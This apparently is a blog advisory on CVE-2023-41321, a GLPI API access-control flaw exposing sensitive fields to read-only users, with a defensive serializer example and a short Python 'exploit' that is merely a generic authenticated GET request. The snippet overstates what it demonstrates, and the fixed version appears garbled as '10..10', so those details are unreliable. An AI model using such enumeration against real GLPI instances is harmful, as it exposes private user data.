Recently, a security vulnerability was discovered in the popular Gestionnaire Libre de Parc Informatique (GLPI) software package. GLPI is an open-source asset and IT management application that comes with ITIL service desk features, license tracking, and software auditing capabilities. The vulnerability, CVE-2023-41321, allows an attacker to enumerate sensitive field values on resources through the GLPI API even if they only have read access.

This blog post aims to provide a comprehensive introduction to this vulnerability, including its details, exploit, and the recommended solution. We will also share code snippets demonstrating the vulnerability and links to original references from GLPI's official documentation.

Vulnerability Details

The CVE-2023-41321 vulnerability stems from incorrect access controls in the GLPI API. The issue allows an attacker with read access to resources within GLPI to enumerate, and potentially manipulate, sensitive field values. This could expose sensitive information or enable unauthorized changes to the affected resources.
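To make the access-control mistake concrete, here is an added illustration (not GLPI's code; the item type, column names and right names are constructed for the example). The weak serializer hands every column of a record to any caller holding read access on the resource; the hardened one treats read access as covering only an explicit allowlist of columns and requires a separate right for everything else, so a newly added sensitive column is protected by default:

```python
# Constructed sample record; field and right names are illustrative, not GLPI's schema.
SAMPLE_ITEM = {
    "id": 7,
    "name": "alice",
    "api_token": "constructed-token-value",
    "password_hash": "constructed-hash-value",
}

# Columns that plain READ on the "User" item type may see (allowlist).
READ_VISIBLE = {"User": {"id", "name"}}


def serialize_weak(itemtype: str, item: dict, rights: set) -> dict:
    """Weak pattern: READ on the resource returns every column unchanged."""
    if "READ" not in rights:
        raise PermissionError("read access required")
    return dict(item)


def serialize_hardened(itemtype: str, item: dict, rights: set) -> dict:
    """Hardened pattern: READ returns only allowlisted columns; any other
    column (including ones added later) needs the elevated READ_SENSITIVE right."""
    if "READ" not in rights:
        raise PermissionError("read access required")
    visible = READ_VISIBLE.get(itemtype, set())  # unknown item type: nothing extra
    if "READ_SENSITIVE" in rights:
        return dict(item)
    return {k: v for k, v in item.items() if k in visible}


def exposed_columns(serializer, rights: set) -> set:
    """Columns the given serializer reveals to a caller with these rights."""
    return set(serializer("User", SAMPLE_ITEM, rights))
```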

Exploit

The vulnerability can be exploited by making specially-crafted API calls to the affected GLPI instance. To demonstrate this, we will provide a Python code snippet that uses the 'requests' library to make an API request to an affected GLPI instance:

import requests

# Target resource to query, e.g. 'User' or 'Ticket' (set to the resource of interest).
resource_name = 'User'

url = f'https://your-glpi-domain.com/apirest.php/{resource_name}'
headers = {
    'Content-Type': 'application/json',
    'App-Token': 'your_app_token',        # application token configured in GLPI
    'Session-Token': 'your_session_token' # session token obtained from initSession
}

response = requests.get(url, headers=headers)

if response.status_code == 200:
    data = response.json()
    print(f'Enumerated {len(data)} sensitive fields from the {resource_name} resource:')
    for sensitive_field in data:
        print(sensitive_field)
else:
    print('Failed to enumerate sensitive fields:', response.status_code)

In the above code snippet, we send a GET request to the GLPI API using the appropriate credentials (App-Token and Session-Token) and request data from a specific resource (set resource_name to the target resource). When the script is executed, it prints the number of sensitive fields enumerated and the data obtained for each field if the request succeeds.

Solution

The GLPI team has released a security fix for this vulnerability in version 10..10. Users are strongly advised to upgrade their GLPI installation to this version as soon as possible. Here are the steps to upgrade GLPI:

1. Download GLPI v10..10
2. Follow the official GLPI upgrade documentation to safely update your instance.

References

- GLPI Official Site
- GLPI API Documentation
- CVE Details

Conclusion

The CVE-2023-41321 vulnerability in GLPI is a critical security issue that could lead to data leakage or unauthorized changes to affected resources. It is essential to upgrade your GLPI instance to version 10..10 to address this vulnerability. As always, stay vigilant in keeping your application and server environment up to date with the latest security patches.

Timeline

Published on: 09/27/2023 15:19:00 UTC
Last modified on: 09/29/2023 18:13:00 UTC